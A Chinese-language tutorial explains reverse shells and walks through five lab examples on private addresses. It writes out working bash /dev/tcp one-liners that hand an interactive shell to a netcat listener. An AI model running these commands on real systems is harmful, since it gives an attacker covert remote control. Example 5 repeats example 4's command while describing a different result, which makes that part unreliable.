什么是反弹shell?
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
那么什么情况下正向连接不能用了呢?有如下情况:
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
https://www.zhihu.com/question/24503813
先知社区:Linux 反弹shell(二)反弹shell的本质
https://xz.aliyun.com/t/2549
FREEBUF:浅析重定向与反弹Shell命令 https://www.freebuf.com/articles/system/153986.html
名词解释:
1. nc -lvp 2222
-l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。
2. bash -i
-i interactive。即产生一个交互式的shell(bash)。
3. /dev/tcp/IP/PORT
特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
说明:因为是基于win平台测试的,windows端的nc在nmap目录中的名字为ncat,所以图中执行的命令为ncat,linux中为nc。
举个例子1🌰:
攻击端 192.168.100.222 | 受害端 192.168.100.123 |
1、执行 nc -lvp 2222 | 1、执行(严格注意命令之间的空格,注意尖括号的方向) bash -i >& /dev/tcp/192.168.100.222/2222 0>&1 |
2、“受害端”执行后“攻击端”即反弹shell成功,如下图 | 2、这时“受害端”控制台处于前台运行模式,不可交互,ctrl+c和ctrl+z都无法中断; |
3、ctrl+c即可退出; 4、所有执行的命令“受害端”均不显示。 | 3、“受害端”不知道“攻击端”执行了哪些操作,历史history也不显示; |
“攻击端”可以执行任何“受害端”系统支持的命令获得数据且“受害端”无回显。 |
举个例子2🌰:
攻击端 192.168.100.222 | 受害端 192.168.100.123 |
1、执行 nc -lvp 2222 | 1、执行(严格注意命令之间的空格,注意尖括号的方向) bash -i > /dev/tcp/192.168.100.222/2222 |
不可执行命令,只能看到“受害端”执行的结果回显; | 能交互,但是无回显数据,数据被返回到“攻击端”,“攻击端”可看到其所执行的丹惠数据,如下图: |
将“受害端”的标准输出重定向到“攻击端”显示出来,但是没实现用命令控制“受害端”; 【受害者执行的结果会返回到侵入者的屏幕上】 |
举个例子3🌰:
攻击端 192.168.100.222 | 受害端 192.168.100.123 |
1、执行 nc -lvp 2222 | 1、执行(严格注意命令之间的空格,注意尖括号的方向) bash -i < /dev/tcp/192.168.100.222/2222 |
与例子2相反,“攻击端”执行命令,攻击端不回显,“受害端”回显“攻击端”的命令结果; | 回显“攻击端”的命令执行结果; |
“攻击端”所执行的命令只显示在“受害端”,“攻击端”只显示命令; |
举个例子4🌰:
攻击端 192.168.100.222 | 受害端 192.168.100.123 |
1、执行 nc -lvp 2222 | 1、执行(严格注意命令之间的空格,注意尖括号的方向) bash -i > /dev/tcp/192.168.100.222/2222 0>&1 |
“攻击端”执行的命令和结果都会回显出来; 错误的命令“攻击端”不会有任何提示; | “受害端”只显示“攻击端”执行过的命令,对于“攻击端”错误的命令会进行提示; |
“攻击端”所执行的命令,除错误命令外,均会显示在“攻击端”,“受害端”只显示“攻击端”执行的错误命令的回显; |
举个例子5🌰:
整合以上几种的优缺点 | |
攻击端 192.168.100.222 | 受害端 192.168.100.123 |
1、执行 nc -lvp 2222 | 1、执行(严格注意命令之间的空格,注意尖括号的方向) bash -i > /dev/tcp/192.168.100.222/2222 0>&1 |
“攻击端”所执行的全部命令均会回显在在“攻击端”,“受害端”不显示任何; |